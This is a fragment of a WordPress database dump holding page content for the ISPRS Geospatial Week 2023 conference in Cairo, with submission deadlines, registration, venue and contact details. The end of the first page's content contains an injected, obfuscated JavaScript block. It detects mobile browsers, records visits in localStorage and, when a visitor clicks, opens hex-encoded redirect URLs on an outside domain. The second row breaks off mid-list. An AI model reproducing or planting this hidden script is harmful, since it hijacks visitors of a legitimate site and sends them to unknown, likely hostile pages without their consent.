src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-19 11:05:43','2023-04-19 11:05:43','',3066,'https://gsw2023.com/?p=4067',0,'revision','',0),
(4068,1,'2023-04-19 11:09:30','2023-04-19 11:09:30','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: gray;\"><span style=\"font-size: 18pt;\"><strong>ISPRS Geospatial Week: 2-7 September 2023</strong></span></h5>\n<div class=\"three_quarter first\">\n<div class=\"gap-10\">\n<h5></h5>\n</div>\n</div>\n<div class=\"three_quarter first\">\n<p><span style=\"font-size: 14pt;\"><strong>Important Dates:</strong></span></p>\n<ol>\n<li><span style=\"font-size: 12pt;\"><strong> Annals (Fully Reviewed Papers):</strong></span></li>\n</ol>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</li>\n<li>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></li>\n<li>Camera ready paper submission: June 15, 2023 <span style=\"text-decoration: line-through;\">June 1, 2023</span></li>\n<li><strong>Priority well be given to early Submissions</strong></li>\n</ul>\n</li>\n</ul>\n<p>&nbsp;</p>\n<ol start=\"2\">\n<li><span style=\"font-size: 12pt;\"><strong> Archives (Abstract Reviewed Papers):</strong></span></li>\n</ol>\n<ul>\n<li>Abstracts submission (Archives):<del> April 15, 2023</del> , May 15, 2023 (hard deadline, no extension)</li>\n<li>Abstracts Author notification: <del>May 15, 2023</del>, May 21, 2023</li>\n<li>Camera ready paper submission:<del> June 1, 2023</del>, June 15, 2023</li>\n<li></li>\n</ul>\n<p>&nbsp;</p>\n</div>\n<p><strong style=\"font-size: 14pt;\">Registration deadlines</strong></p>\n<div class=\"three_quarter first\">\n<ul>\n<li>Early bird registration deadline: <del>June 1, 2023</del>, June 15, 2023</li>\n<li>Late registration deadline: July 15, 